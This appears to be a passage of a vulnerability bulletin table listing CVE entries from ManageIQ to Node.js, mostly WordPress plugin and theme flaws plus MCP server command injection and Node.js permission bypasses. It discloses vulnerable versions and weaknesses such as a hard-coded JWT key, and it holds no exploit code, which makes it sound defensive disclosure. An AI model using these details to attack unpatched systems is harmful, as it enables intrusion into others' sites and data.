| ManageIQ--manageiq | ManageIQ is an open-source management platform. A flaw was found in the ManageIQ API prior to version radjabov-2 where a malformed TimeProfile could be created, causing later UI and API requests to time out and leading to a denial of service. Version radjabov-2 contains a patch. One may also apply the patch manually. | 2026-01-21 | not yet calculated | CVE-2026-22598 | https://github.com/ManageIQ/manageiq/security/advisories/GHSA-m832-x3g8-63j3 https://github.com/ManageIQ/manageiq/commit/79cef10c7d0278d8a37c3f547c426948180df4df.patch https://github.com/ManageIQ/manageiq/commit/86132851257d73ed9e31a88315e47a8a2b838113 |
| Marco Milesi--ANAC XML Viewer | Server-Side Request Forgery (SSRF) vulnerability in Marco Milesi ANAC XML Viewer anac-xml-viewer allows Server Side Request Forgery. This issue affects ANAC XML Viewer: from n/a through <= 1.8.2. | 2026-01-22 | not yet calculated | CVE-2025-64252 | https://patchstack.com/database/Wordpress/Plugin/anac-xml-viewer/vulnerability/wordpress-anac-xml-viewer-plugin-1-8-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Marco van Wieren--WPO365 | Server-Side Request Forgery (SSRF) vulnerability in Marco van Wieren WPO365 wpo365-login allows Server Side Request Forgery. This issue affects WPO365: from n/a through <= 40.0. | 2026-01-22 | not yet calculated | CVE-2025-67961 | https://patchstack.com/database/Wordpress/Plugin/wpo365-login/vulnerability/wordpress-wpo365-plugin-40-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Marcus (aka @msykes)--WP FullCalendar | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data. This issue affects WP FullCalendar: from n/a through <= 1.6. | 2026-01-23 | not yet calculated | CVE-2026-24523 | https://patchstack.com/database/Wordpress/Plugin/wp-fullcalendar/vulnerability/wordpress-wp-fullcalendar-plugin-1-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| Mario Peshev--WP-CRM System | Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP-CRM System: from n/a through <= 3.4.5. | 2026-01-22 | not yet calculated | CVE-2025-62106 | https://patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability-2?_s_id=cve |
| marynixie--Related Posts Thumbnails Plugin for WordPress | Cross-Site Request Forgery (CSRF) vulnerability in marynixie Related Posts Thumbnails Plugin for WordPress related-posts-thumbnails allows Cross Site Request Forgery. This issue affects Related Posts Thumbnails Plugin for WordPress: from n/a through <= 4.3.1. | 2026-01-23 | not yet calculated | CVE-2026-24596 | https://patchstack.com/database/Wordpress/Plugin/related-posts-thumbnails/vulnerability/wordpress-related-posts-thumbnails-plugin-for-wordpress-plugin-4-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| matiskiba--Ravpage | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in matiskiba Ravpage ravpage allows Reflected XSS. This issue affects Ravpage: from n/a through <= 2.33. | 2026-01-22 | not yet calculated | CVE-2025-68835 | https://patchstack.com/database/Wordpress/Plugin/ravpage/vulnerability/wordpress-ravpage-plugin-2-33-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MCP Manager for Claude Desktop--MCP Manager for Claude Desktop | MCP Manager for Claude Desktop execute-command Command Injection Sandbox Escape Vulnerability. This vulnerability allows remote attackers to bypass the sandbox on affected installations of MCP Manager for Claude Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of MCP config objects. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escape the sandbox and execute arbitrary code in the context of the current process at medium integrity. Was ZDI-CAN-27810. | 2026-01-23 | not yet calculated | CVE-2026-0757 | ZDI-26-023 |
| mcp-server-siri-shortcuts--mcp-server-siri-shortcuts | mcp-server-siri-shortcuts shortcutName Command Injection Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of mcp-server-siri-shortcuts. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the shortcutName parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-27910. | 2026-01-23 | not yet calculated | CVE-2026-0758 | ZDI-26-024 |
| merkulove--Audier For Elementor | Missing Authorization vulnerability in merkulove Audier For Elementor audier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Audier For Elementor: from n/a through <= 1.0.9. | 2026-01-22 | not yet calculated | CVE-2025-66139 | https://patchstack.com/database/Wordpress/Plugin/audier-elementor/vulnerability/wordpress-audier-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Carter for Elementor | Missing Authorization vulnerability in merkulove Carter for Elementor carter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Carter for Elementor: from n/a through <= 1.0.2. | 2026-01-22 | not yet calculated | CVE-2025-66136 | https://patchstack.com/database/Wordpress/Plugin/carter-elementor/vulnerability/wordpress-carter-for-elementor-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Comparimager for Elementor | Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Comparimager for Elementor: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-66142 | https://patchstack.com/database/Wordpress/Plugin/comparimager-elementor/vulnerability/wordpress-comparimager-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Crumber | Missing Authorization vulnerability in merkulove Crumber crumber-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Crumber: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-66143 | https://patchstack.com/database/Wordpress/Plugin/crumber-elementor/vulnerability/wordpress-crumber-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Imager for Elementor | Missing Authorization vulnerability in merkulove Imager for Elementor imager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Imager for Elementor: from n/a through <= 2.0.4. | 2026-01-22 | not yet calculated | CVE-2025-66135 | https://patchstack.com/database/Wordpress/Plugin/imager-elementor/vulnerability/wordpress-imager-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Motionger for Elementor | Missing Authorization vulnerability in merkulove Motionger for Elementor motionger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Motionger for Elementor: from n/a through <= 2.0.4. | 2026-01-22 | not yet calculated | CVE-2025-66138 | https://patchstack.com/database/Wordpress/Plugin/motionger-elementor/vulnerability/wordpress-motionger-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Scroller | Missing Authorization vulnerability in merkulove Scroller scroller allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Scroller: from n/a through <= 2.0.2. | 2026-01-22 | not yet calculated | CVE-2025-66141 | https://patchstack.com/database/Wordpress/Plugin/scroller/vulnerability/wordpress-scroller-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Searcher for Elementor | Missing Authorization vulnerability in merkulove Searcher for Elementor searcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Searcher for Elementor: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-66137 | https://patchstack.com/database/Wordpress/Plugin/searcher-elementor/vulnerability/wordpress-searcher-for-elementor-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Uper for Elementor | Missing Authorization vulnerability in merkulove Uper for Elementor uper-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Uper for Elementor: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-66140 | https://patchstack.com/database/Wordpress/Plugin/uper-elementor/vulnerability/wordpress-uper-for-elementor-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
| Merv Barrett--Easy Property Listings | Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Property Listings: from n/a through <= 3.5.17. | 2026-01-22 | not yet calculated | CVE-2025-68072 | https://patchstack.com/database/Wordpress/Plugin/easy-property-listings/vulnerability/wordpress-easy-property-listings-plugin-3-5-16-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through <= 4.2.8.0. | 2026-01-22 | not yet calculated | CVE-2026-24380 | https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-8-0-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--RegistrationMagic | Cross-Site Request Forgery (CSRF) vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Cross Site Request Forgery. This issue affects RegistrationMagic: from n/a through <= 6.0.6.9. | 2026-01-22 | not yet calculated | CVE-2026-24374 | https://patchstack.com/database/Wordpress/Plugin/custom-registration-form-builder-with-submission-manager/vulnerability/wordpress-registrationmagic-plugin-6-0-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Micro.company--Form to Chat App | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Micro.company Form to Chat App form-to-chat allows Stored XSS. This issue affects Form to Chat App: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2026-22463 | https://patchstack.com/database/Wordpress/Plugin/form-to-chat/vulnerability/wordpress-form-to-chat-app-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mikado-Themes--Biagiotti | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Biagiotti biagiotti allows PHP Local File Inclusion. This issue affects Biagiotti: from n/a through < 3.5.2. | 2026-01-22 | not yet calculated | CVE-2025-67938 | https://patchstack.com/database/Wordpress/Theme/biagiotti/vulnerability/wordpress-biagiotti-theme-3-5-2-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Cocco | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Cocco cocco allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cocco: from n/a through <= 1.5.1. | 2026-01-22 | not yet calculated | CVE-2026-22391 | https://patchstack.com/database/Wordpress/Theme/cocco/vulnerability/wordpress-cocco-theme-1-5-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Curly | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Curly curly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Curly: from n/a through <= 3.3. | 2026-01-22 | not yet calculated | CVE-2026-22393 | https://patchstack.com/database/Wordpress/Theme/curly/vulnerability/wordpress-curly-theme-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Depot | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Depot depot allows PHP Local File Inclusion. This issue affects Depot: from n/a through <= 1.16. | 2026-01-22 | not yet calculated | CVE-2025-54003 | https://patchstack.com/database/Wordpress/Theme/depot/vulnerability/wordpress-depot-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Dolcino | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Dolcino dolcino allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Dolcino: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2026-22411 | https://patchstack.com/database/Wordpress/Theme/dolcino/vulnerability/wordpress-dolcino-theme-1-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Fiorello | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Fiorello fiorello allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fiorello: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2026-22396 | https://patchstack.com/database/Wordpress/Theme/fiorello/vulnerability/wordpress-fiorello-theme-1-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Fleur | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Fleur fleur allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fleur: from n/a through <= 2.0. | 2026-01-22 | not yet calculated | CVE-2026-22398 | https://patchstack.com/database/Wordpress/Theme/fleur/vulnerability/wordpress-fleur-theme-2-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Holmes | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Holmes holmes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Holmes: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2026-22400 | https://patchstack.com/database/Wordpress/Theme/holmes/vulnerability/wordpress-holmes-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Innovio | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Innovio innovio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Innovio: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2026-22404 | https://patchstack.com/database/Wordpress/Theme/innovio/vulnerability/wordpress-innovio-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Justicia | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Justicia justicia allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Justicia: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2026-22409 | https://patchstack.com/database/Wordpress/Theme/justicia/vulnerability/wordpress-justicia-theme-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Overton | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Overton overton allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Overton: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22406 | https://patchstack.com/database/Wordpress/Theme/overton/vulnerability/wordpress-overton-theme-1-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--PawFriends - Pet Shop and Veterinary WordPress Theme | Cross-Site Request Forgery (CSRF) vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Cross Site Request Forgery. This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22382 | https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mikado-Themes--Powerlift | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Powerlift powerlift allows PHP Local File Inclusion. This issue affects Powerlift: from n/a through < 3.2.1. | 2026-01-22 | not yet calculated | CVE-2025-67940 | https://patchstack.com/database/Wordpress/Theme/powerlift/vulnerability/wordpress-powerlift-theme-3-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Roam | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Roam roam allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Roam: from n/a through <= 2.1.1. | 2026-01-22 | not yet calculated | CVE-2026-22407 | https://patchstack.com/database/Wordpress/Theme/roam/vulnerability/wordpress-roam-theme-2-1-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Rosebud | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Rosebud rosebud allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Rosebud: from n/a through <= 1.4. | 2026-01-23 | not yet calculated | CVE-2026-24631 | https://patchstack.com/database/Wordpress/Theme/rosebud/vulnerability/wordpress-rosebud-theme-1-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Verdure | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Verdure verdure allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Verdure: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2026-22430 | https://patchstack.com/database/Wordpress/Theme/verdure/vulnerability/wordpress-verdure-theme-1-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Wanderland | Missing Authorization vulnerability in Mikado-Themes Wanderland wanderland allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wanderland: from n/a through <= 1.5. | 2026-01-22 | not yet calculated | CVE-2026-22458 | https://patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-theme-1-5-broken-access-control-vulnerability?_s_id=cve |
| Milner--ImageDirector Capture | The use of a hard-coded encryption key in calls to the Password function in C2SGlobalSettings.dll in Milner ImageDirector Capture on Windows allows a local attacker to decrypt database credentials by reading the cryptographic key from the executable. This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58740 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Insufficiently Protected Credentials vulnerability in the Credential Field of Milner ImageDirector Capture allows retrieval of credential material and enables database access. This issue affects ImageDirector Capture: from 7.0.9 through 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58741 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Insufficiently Protected Credentials, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Connection Settings dialog in Milner ImageDirector Capture on Windows allows Adversary in the Middle (AiTM) by modifying the 'Server' field to redirect client authentication. This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58742 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Use of a Broken or Risky Cryptographic Algorithm (DES) vulnerability in the Password class in C2SConnections.dll in Milner ImageDirector Capture on Windows allows Encryption Brute Forcing to obtain database credentials. This issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58743 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Use of Default Credentials, Hard-coded Credentials vulnerability in C2SGlobalSettings.dll in Milner ImageDirector Capture on Windows allows decryption of document archive files using credentials decrypted with hard-coded application encryption key. This issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58744 | https://sra.io/advisories |
| miniserve--miniserve | A TOCTOU and symlink race in svenstaro/miniserve 0.32.0 upload finalization (when uploads are enabled) can allow an attacker to overwrite arbitrary files outside the intended upload/document root in deployments where the attacker can create/replace filesystem entries in the upload destination directory (e.g., shared writable directory/volume). | 2026-01-23 | not yet calculated | CVE-2025-67124 | https://github.com/svenstaro/miniserve https://gist.github.com/thesmartshadow/55688f87f8b985eb530e07d00ef8c63f |
| mkscripts--Download After Email | Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Download After Email: from n/a through <= 2.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24541 | https://patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-9-broken-access-control-vulnerability?_s_id=cve |
| mndpsingh287--WP Mail | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mndpsingh287 WP Mail wp-mail allows Reflected XSS. This issue affects WP Mail: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2025-68008 | https://patchstack.com/database/Wordpress/Plugin/wp-mail/vulnerability/wordpress-wp-mail-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| monetagwp--Monetag Official Plugin | Missing Authorization vulnerability in monetagwp Monetag Official Plugin monetag-official allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Monetag Official Plugin: from n/a through <= 1.1.3. | 2026-01-23 | not yet calculated | CVE-2026-24551 | https://patchstack.com/database/Wordpress/Plugin/monetag-official/vulnerability/wordpress-monetag-official-plugin-plugin-1-1-3-broken-access-control-vulnerability-2?_s_id=cve |
| mwtemplates--DeepDigital | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in mwtemplates DeepDigital deepdigital allows Code Injection. This issue affects DeepDigital: from n/a through <= 1.0.2. | 2026-01-22 | not yet calculated | CVE-2026-22469 | https://patchstack.com/database/Wordpress/Theme/deepdigital/vulnerability/wordpress-deepdigital-theme-1-0-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| MyThemeShop--WP Subscribe | Missing Authorization vulnerability in MyThemeShop WP Subscribe wp-subscribe allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Subscribe: from n/a through <= 1.2.16. | 2026-01-23 | not yet calculated | CVE-2026-24522 | https://patchstack.com/database/Wordpress/Plugin/wp-subscribe/vulnerability/wordpress-wp-subscribe-plugin-1-2-16-broken-access-control-vulnerability?_s_id=cve |
| Nelio Software--Nelio AB Testing | Improper Control of Generation of Code ('Code Injection') vulnerability in Nelio Software Nelio AB Testing nelio-ab-testing allows Code Injection. This issue affects Nelio AB Testing: from n/a through <= 8.1.8. | 2026-01-22 | not yet calculated | CVE-2025-67944 | https://patchstack.com/database/Wordpress/Plugin/nelio-ab-testing/vulnerability/wordpress-nelio-ab-testing-plugin-8-1-8-arbitrary-code-execution-vulnerability?_s_id=cve |
| Nelio Software--Nelio Content | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection. This issue affects Nelio Content: from n/a through <= 4.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24572 | https://patchstack.com/database/Wordpress/Plugin/nelio-content/vulnerability/wordpress-nelio-content-plugin-4-1-0-sql-injection-vulnerability?_s_id=cve |
| neo4j--Enterprise Edition | Neo4j Enterprise edition versions prior to 2025.11.2 and 5.26.17 are vulnerable to a potential information disclosure by an attacker who has some legitimate access to the database. The vulnerability allows an attacker without read access to a property to infer information about its value by trying to enumerate all possible values through observing error messages of SET property. We recommend upgrading to 2025.11.2 or 5.26.17 and above, where the issue is fixed. | 2026-01-22 | not yet calculated | CVE-2025-12738 | https://neo4j.com/security/CVE-2025-12738 |
| nerves-hub--nerves_hub_web | NervesHub is a web service that allows users to manage over-the-air (OTA) firmware updates of devices in the field. A vulnerability present starting in version 1.0.0 and prior to version 2.3.0 allowed attackers to brute-force user API tokens due to the predictable format of previously issued tokens. Tokens included user-identifiable components and were not cryptographically secure, making them susceptible to guessing or enumeration. The vulnerability could have allowed unauthorized access to user accounts or API actions protected by these tokens. A fix is available in version 2.3.0 of NervesHub. This version introduces strong, cryptographically-random tokens using `:crypto.strong_rand_bytes/1`, hashing of tokens before database storage to prevent misuse even if the database is compromised, and context-aware token storage to distinguish between session and API tokens. There are no practical workarounds for this issue other than upgrading. In sensitive environments, as a temporary mitigation, firewalling access to the NervesHub server can help limit exposure until an upgrade is possible. | 2026-01-22 | not yet calculated | CVE-2025-64097 | https://github.com/nerves-hub/nerves_hub_web/security/advisories/GHSA-m9vj-776q-vc8m https://github.com/nerves-hub/nerves_hub_web/pull/2024 https://github.com/nerves-hub/nerves_hub_web/releases/tag/v2.3.0 |
| netgsm--Netgsm | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in netgsm Netgsm netgsm allows Reflected XSS. This issue affects Netgsm: from n/a through <= 2.9.63. | 2026-01-22 | not yet calculated | CVE-2025-68010 | https://patchstack.com/database/Wordpress/Plugin/netgsm/vulnerability/wordpress-netgsm-plugin-2-9-62-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| NewPlane--open5GS | Open 5GS WebUI uses a hard-coded JWT signing key (change-me) whenever the environment variable JWT_SECRET_KEY is unset. | 2026-01-20 | not yet calculated | CVE-2026-0622 | https://github.com/open5gs/open5gs/issues/2264 https://github.com/open5gs/open5gs/issues/856 https://github.com/open5gs/open5gs/pull/857 |
| Ninetheme--Anarkali | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ninetheme Anarkali anarkali allows PHP Local File Inclusion. This issue affects Anarkali: from n/a through <= 1.0.9. | 2026-01-22 | not yet calculated | CVE-2025-47474 | https://patchstack.com/database/Wordpress/Theme/anarkali/vulnerability/wordpress-anarkali-theme-1-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| Ninetheme--Electron | Missing Authorization vulnerability in Ninetheme Electron electron allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Electron: from n/a through <= 1.8.2. | 2026-01-22 | not yet calculated | CVE-2025-5805 | https://patchstack.com/database/Wordpress/Theme/electron/vulnerability/wordpress-electron-theme-1-8-2-broken-access-control-vulnerability?_s_id=cve |
| Ninja Team--GDPR CCPA Compliance Support | Missing Authorization vulnerability in Ninja Team GDPR CCPA Compliance Support ninja-gdpr-compliance allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GDPR CCPA Compliance Support: from n/a through <= 2.7.4. | 2026-01-22 | not yet calculated | CVE-2025-68073 | https://patchstack.com/database/Wordpress/Plugin/ninja-gdpr-compliance/vulnerability/wordpress-gdpr-ccpa-compliance-support-plugin-2-7-4-broken-access-control-vulnerability?_s_id=cve |
| NixOS--nixpkgs | Tandoor Recipes is a recipe manager that can be installed with the Nix package manager. Starting in version 23.05 and prior to version 26.05, when using the default configuration of Tandoor Recipes, specifically using SQLite and default `MEDIA_ROOT`, the full database file may be externally accessible, potentially on the Internet. The root cause is that the NixOS module configures the working directory of Tandoor Recipes, as well as the value of `MEDIA_ROOT`, to be `/var/lib/tandoor-recipes`. This causes Tandoor Recipes to create its `db.sqlite3` database file in the same directory as `MEDIA_ROOT`, causing it to be accessible without authentication through HTTP like any other media file. This is the case when using `GUNICORN_MEDIA=1` or when using a web server like nginx to serve media files. NixOS 26.05 changes the default value of `MEDIA_ROOT` to a subfolder of the data directory. This only applies to configurations with `system.stateVersion` >= 26.05. For older configurations, one of the workarounds should be applied instead. NixOS 25.11 has received a backport of this patch, though it doesn't fix this vulnerability without user intervention. A recommended workaround is to move `MEDIA_ROOT` into a subdirectory. Non-recommended workarounds include switching to PostgreSQL or disallowing access to `db.sqlite3`. | 2026-01-19 | not yet calculated | CVE-2026-23838 | https://github.com/NixOS/nixpkgs/security/advisories/GHSA-g8w3-p77x-mmxh https://github.com/NixOS/nixpkgs/issues/338339 https://github.com/NixOS/nixpkgs/pull/427845 https://github.com/NixOS/nixpkgs/pull/481140 |
| noCreativity--Dooodl | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS. This issue affects Dooodl: from n/a through <= 2.3.0. | 2026-01-22 | not yet calculated | CVE-2025-68871 | https://patchstack.com/database/Wordpress/Plugin/dooodl/vulnerability/wordpress-dooodl-plugin-2-3-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| nodejs--node | A flaw in Node.js's Permissions model allows attackers to bypass `--allow-fs-read` and `--allow-fs-write` restrictions using crafted relative symlink paths. By chaining directories and symlinks, a script granted access only to the current directory can escape the allowed path and read sensitive files. This breaks the expected isolation guarantees and enables arbitrary file read/write, leading to potential system compromise. This vulnerability affects users of the permission model on Node.js v20, v22, v24, and v25. | 2026-01-20 | not yet calculated | CVE-2025-55130 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's buffer allocation logic can expose uninitialized memory when allocations are interrupted, when using the `vm` module with the timeout option. Under specific timing conditions, buffers allocated with `Buffer.alloc` and other `TypedArray` instances like `Uint8Array` may contain leftover data from previous operations, allowing in-process secrets like tokens or passwords to leak or causing data corruption. While exploitation typically requires precise timing or in-process code execution, it can become remotely exploitable when untrusted input influences workload and timeouts, leading to potential confidentiality and integrity impact. | 2026-01-20 | not yet calculated | CVE-2025-55131 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's permission model allows a file's access and modification timestamps to be changed via `futimes()` even when the process has only read permissions. Unlike `utimes()`, `futimes()` does not apply the expected write-permission checks, which means file metadata can be modified in read-only directories. This behavior could be used to alter timestamps in ways that obscure activity, reducing the reliability of logs. This vulnerability affects users of the permission model on Node.js v20, v22, v24, and v25. | 2026-01-20 | not yet calculated | CVE-2025-55132 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A memory leak in Node.js's OpenSSL integration occurs when converting `X.509` certificate fields to UTF-8 without freeing the allocated buffer. When applications call `socket.getPeerCertificate(true)`, each certificate field leaks memory, allowing remote clients to trigger steady memory growth through repeated TLS connections. Over time this can lead to resource exhaustion and denial of service. | 2026-01-20 | not yet calculated | CVE-2025-59464 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A malformed `HTTP/2 HEADERS` frame with oversized, invalid `HPACK` data can cause Node.js to crash by triggering an unhandled `TLSSocket` error `ECONNRESET`. Instead of safely closing the connection, the process crashes, enabling a remote denial of service. This primarily affects applications that do not attach explicit error handlers to secure sockets, for example: `server.on('secureConnection', socket => { socket.on('error', err => { console.log(err) }) })` | 2026-01-20 | not yet calculated | CVE-2025-59465 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
